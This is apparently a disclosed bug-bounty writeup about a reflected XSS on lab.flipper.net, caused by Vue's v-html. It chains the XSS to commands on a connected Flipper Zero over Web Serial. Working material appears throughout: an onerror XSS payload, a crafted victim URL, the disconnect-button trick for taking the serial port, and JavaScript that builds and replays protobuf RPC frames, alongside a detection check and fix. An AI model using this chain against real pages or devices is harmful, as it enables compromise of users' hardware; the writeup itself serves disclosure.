Got RCE through an XSS on lab.flipper.net, here's the writeup
PoC video: printing 1337 on the Flipper's screen
I was installing the Unleashed firmware on my Flipper and noticed that the "channel" parameter was being reflected in the dropdown. Being the nerd I am, I injected an <img/src/onerror=alert(1)> tag (from https://tinyxss.terjanq.me/) and boom, XSS.
The vulnerability comes from the "v-html" directive of Vue.js on the page, which renders the option label as raw HTML instead of text:
<q-item-label v-html="scope.opt.label" />
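The sink above, modelled in plain JavaScript as an added example (this is not code from the writeup or from lab.flipper.net). It assumes the "channel" value arrives as a URL query parameter and is used as a dropdown option label; renderUnescaped stands in for v-html and renderEscaped for v-text / {{ }} interpolation, and reflectsMarkup is a crude tripwire you could drop into a test suite.

```javascript
// Added example, not code from the writeup or lab.flipper.net. Assumption: the
// "channel" value comes from a URL query parameter and becomes an option label.

const PAYLOAD = '<img/src/onerror=alert(1)>'; // tinyxss payload used in the writeup

function channelFromUrl(url) {
  return new URL(url).searchParams.get('channel') ?? '';
}

// What `v-html="scope.opt.label"` does: the label string is parsed as markup,
// so a tag inside it becomes a live element and its onerror handler runs.
function renderUnescaped(label) {
  return `<div class="q-item__label">${label}</div>`;
}

// What `{{ scope.opt.label }}` / v-text does: the string is inserted as text.
// Escaping the five HTML metacharacters is the string-level equivalent.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderEscaped(label) {
  return `<div class="q-item__label">${escapeHtml(label)}</div>`;
}

// Crude tripwire: did a reflected parameter that contains a tag or an
// on*= handler reach the rendered markup unchanged?
function reflectsMarkup(input, rendered) {
  return /<\s*\/?[a-z]|\bon[a-z]+\s*=/i.test(input) && rendered.includes(input);
}

// Constructed victim URL carrying the payload in the channel parameter.
const victimUrl = 'https://lab.flipper.net/?channel=' + encodeURIComponent(PAYLOAD);
const label = channelFromUrl(victimUrl);
console.log(reflectsMarkup(label, renderUnescaped(label))); // true: XSS
console.log(reflectsMarkup(label, renderEscaped(label)));   // false
```

The fix in the real component is to stop using v-html for a value that can contain user input (v-text, or interpolation, renders it as text); escaping at the string level as shown is only the equivalent for an example that runs outside the browser.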
alert() is boring, let's get RCE! The website is used to interface with your Flipper Zero: install new apps, update the firmware, etc. This is done with the Web Serial API, an experimental API for reading from and writing to serial devices. What could go wrong?
The website has to ask the user for permission to connect, like for the webcam, but we can assume the user already granted it, because the XSS doesn't trigger unless a Flipper is connected. So I went to read how the serial communication is done: https://github.com/flipperdevices/lab.flipper.net
It looks like if we can call screenFrame(data), the application will send a command that makes the Flipper draw on its screen, which is enough for the PoC. The problem was that everything was wrapped by Webpack. I spent a lot of time in the debugger looking for globally accessible objects, and oh boi, it was impossible (tips welcome). Having given up on reusing the app's own code, I had to make my payload talk to the Flipper over serial directly.
So I just grab the port from navigator.serial.getPorts() and talk to it, right? Wrong: the port is already in use, and I can't get at the app's reference to it because of Webpack. My workaround was to disconnect and reconnect, by doing a .click() on the disconnect button (fuck webpack). Now we just need to send the right data to the Flipper aaaaaaand... the protocol is undocumented, nice. It uses Protobuf, which is not that hard to understand, but what an overkill of a protocol the Flipper has, gosh (actually amazing): https://github.com/flipperdevices/flipperzero-protobuf
To simplify the PoC I just did all the steps in the application itself and console.log()'d the shit out of it. I had to use HTTP Mock to modify the JS so I could capture all the "packets" properly, since it was going too fast. I also had to manually edit the 3rd byte of every packet in the final payload, because it's incremental (guesswork). By the way, every connection begins with start_rpc_session\r. I'm not sure what every byte is, but the biggest byte array is a bitmap of the 1337 shown on screen. Then I just replayed the data to the serial port.
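The serial takeover and the replayed session above, as an added example (not code from the writeup, from lab.flipper.net or from flipperzero-protobuf). It shows what the captured packets are: each RPC frame is varint(length) followed by a PB.Main message, and Main.command_id is field 1 (wire tag 0x08), so a short frame starts [len][0x08][command_id], which is the "3rd byte" that has to increase per request; once a frame is 128 bytes or longer (the bitmap frame is), the length prefix is two bytes and the id moves to the 4th byte. The field numbers marked ASSUMED are placeholders, the bitmap is a constructed pattern rather than the 1337 image, and replaySession takes a Web Serial-like object so the framing can be checked offline.

```javascript
// Added example, not code from the writeup, lab.flipper.net or flipperzero-protobuf.
// Numbers marked ASSUMED are placeholders; take the real ones from flipper.proto
// and gui.proto before sending anything to a device.

// ---- minimal protobuf wire encoding ---------------------------------------
function varint(n) {                          // unsigned LEB128
  const out = [];
  do { let b = n & 0x7f; n >>>= 7; if (n) b |= 0x80; out.push(b); } while (n);
  return out;
}
const tagVarint = (f, v) => [...varint(f << 3), ...varint(v)];                    // wire type 0
const tagBytes  = (f, b) => [...varint((f << 3) | 2), ...varint(b.length), ...b]; // wire type 2

const MAIN_COMMAND_ID   = 1;   // PB.Main.command_id (this one is real)
const MAIN_EMPTY        = 4;   // PB.Main.empty: ASSUMED field number
const MAIN_SCREEN_FRAME = 25;  // PB.Main.gui_screen_frame: ASSUMED field number
const SCREEN_FRAME_DATA = 1;   // PB_Gui.ScreenFrame.data: ASSUMED field number

// Frame = varint(len(Main)) || Main, with Main = command_id || one content field.
function encodeFrame(commandId, contentField, contentBytes) {
  const main = [...tagVarint(MAIN_COMMAND_ID, commandId), ...tagBytes(contentField, contentBytes)];
  return Uint8Array.from([...varint(main.length), ...main]);
}

// ---- decoding the id back out (what "the 3rd byte" really is) -------------
function readVarint(buf, pos) {
  let v = 0, shift = 0, b;
  do { b = buf[pos++]; v |= (b & 0x7f) << shift; shift += 7; } while (b & 0x80);
  return [v >>> 0, pos];
}
function commandIdOf(frame) {
  const [, pos] = readVarint(frame, 0);                       // skip the length prefix
  if (frame[pos] !== 0x08) throw new Error('expected command_id tag');
  const [id] = readVarint(frame, pos + 1);
  return { id, offset: pos + 1 };                             // 2 for short frames, 3 once len >= 128
}

// ---- the session the writeup replayed: start string, then numbered frames --
const START_RPC = 'start_rpc_session\r';   // CLI command that switches the port to RPC mode

// Constructed 128x64 1-bpp frame buffer (1024 bytes): a placeholder stripe
// pattern, not the 1337 image; the bit layout is whatever the captured frame used.
function placeholderBitmap() {
  const buf = new Uint8Array((128 * 64) / 8);
  for (let i = 0; i < buf.length; i++) buf[i] = i & 1 ? 0xff : 0x00;
  return buf;
}

// Returns the byte chunks to write, with command_id counting up from firstId.
function buildSession(contents, firstId = 1) {
  const out = [new TextEncoder().encode(START_RPC)];
  contents.forEach((c, i) => out.push(encodeFrame(firstId + i, c.field, c.bytes)));
  return out;
}

// Write the chunks to a Web Serial port. On the page this runs after the app
// has been disconnected (the .click() trick), so getPorts() returns a port the
// user already granted and nothing else holds open.
async function replaySession(serial, chunks, baudRate = 230400) {
  const [port] = await serial.getPorts();
  if (!port) throw new Error('no previously granted serial port');
  await port.open({ baudRate });
  const writer = port.writable.getWriter();
  try { for (const c of chunks) await writer.write(c); }
  finally { writer.releaseLock(); await port.close(); }
}

// Example session: one small frame, then one carrying the bitmap.
const session = buildSession([
  { field: MAIN_EMPTY, bytes: [] },
  { field: MAIN_SCREEN_FRAME, bytes: tagBytes(SCREEN_FRAME_DATA, placeholderBitmap()) },
]);
for (const c of session.slice(1)) {
  const head = Array.from(c.slice(0, 6)).map((b) => b.toString(16).padStart(2, '0')).join(' ');
  console.log(head, '-> command_id', commandIdOf(c).id, 'at byte', commandIdOf(c).offset);
}
// In the page: replaySession(navigator.serial, session).catch(console.error);
```

Keeping the encoding pure (buildSession) and the I/O separate (replaySession) is what lets you verify the captured bytes offline; it also means the "edit the 3rd byte by hand" step becomes a loop over command_id, and it keeps working when a frame grows past 127 bytes and the id shifts one byte to the right.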
What a wonderful era we live in, where an XSS can get you RCE on an embedded device (ಥ﹏ಥ). The PoC only pushes a frame to the screen, but the same RPC session also carries the storage and app-launch requests, so anything the Flipper's RPC can do is reachable once the page is owned.
Shout out to huntr.dev for handling the disclosure process. https://huntr.dev/bounties/03ce4392-c715-4127-af9b-e647d64fdd38/